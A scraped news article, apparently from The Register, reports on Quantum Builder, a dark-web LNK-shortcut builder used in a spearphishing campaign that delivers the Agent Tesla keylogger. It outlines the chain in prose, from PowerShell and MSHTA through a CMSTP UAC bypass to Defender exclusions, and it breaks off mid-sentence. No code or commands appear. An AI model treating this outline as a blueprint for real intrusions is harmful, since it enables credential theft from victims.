Want to sneak a RAT into Windows? Buy Quantum Builder on the dark web – The Register

Npressfetimg 2337.png

A tool sold on the dark web that allows cybercriminals to build malicious shortcuts for delivering malware is being used in a campaign pushing a longtime .NET keylogger and remote access trojan (RAT) named Agent Tesla.

The customizable tool, Quantum Builder (also known as Quantum LNK Builder), was seen for sale on cybercriminal markets in June by security researchers with Cyware. Quantum Builder lets attackers to create malicious Microsoft Windows LNK shortcuts.

Through the shortcuts, cybercriminals can create and deliver malicious payloads using legitimate system tools like PowerShell and Microsoft HTML Application (HTA) files.

In a report this week, researchers detected a campaign using Quantum Builder to deliver Agent Tesla, malware that has been around since 2014 and has been used to steal sensitive information from a victim’s device, including user credentials, credentials from browsers, keystrokes, and clipboard data.

Quantum Builder has been linked to the advanced persistent threat (APT) gang Lazarus Group, based on shared tactics, techniques, and procedures (TTPs) and overlaps in source code, but they can’t with any confidence attribute the current campaign to Lazarus or any particular threat group.

Malware as a service is cheaper than you think

Quantum Builder, which Cyware says could be had for about $200 for two months of access to up to $950 for lifetime access, can generate LNK, HTA, and ISO payloads that include sophisticated download techniques and deliver the final payload via a multi-staged attack chain.

That includes decrypting In-memory PowerShell scripts using the HTA file to bypass User Account Control (UAC) through Microsoft Connection Manager Profile Installer (CMSTP) – a program used to install Connection Manager service profiles – to launch Agent Tesla with administrative rights.

UAC Bypass also is used to run Windows Defenders exclusions on the system.

Quantum Builder has other techniques to evade detection and camouflage tactics, including using living-off-the-land binaries (LOLBins), which are legitimate Microsoft tools. It also “incorporates techniques like decoys, UAC Prompts and in-memory PowerShell to execute the final payload,” the researchers found, adding that “these Techniques are regularly updated by the Developers of the Quantum Builder.”

The infection chain starts with a spearphishing email whose subject line is an order confirmation from GuangDong Nanz Technology, a Chinese manufacturing company. The email includes the LNK file bundled as a GZIP archive that, once executed by the victim, activates the embedded PowerShell codes that launches MSHTA, which then executives the HTA file that is hosted on a remote server.

“The HTA File then decrypts a PowerShell loader script which decrypts and loads another PowerShell script after performing AES Decryption and GZIP Decompression,” they wrote. “The decrypted PowerShell script is the Downloader PS Script, which first downloads the Agent Tesla binary from a remote server, and then executes it with administrative privileges by performing a UAC Bypass using the CMSTP.” 

Agent Tesla is then executed on the victim’s machine with administrative privileges.

ThreatLabz analysts found multiple samples that use a various of the infection chain to deliver Agent Tesla, with the LNK file bundled in a ZIP archive. In this situation, the LNK file also executes the HTA file hosted on the remote server by decoding a command through converting the integers in the command into characters and replacing whitespaces. It also uses MSHTA to execute the HTA file from a remote URL.

In their report in June, the Cyware team said there were advantages to attackers using …….

Source: https://www.theregister.com/2022/09/28/quantum_builder_agent_tesla_rat/

Leave a comment

Your email address will not be published. Required fields are marked *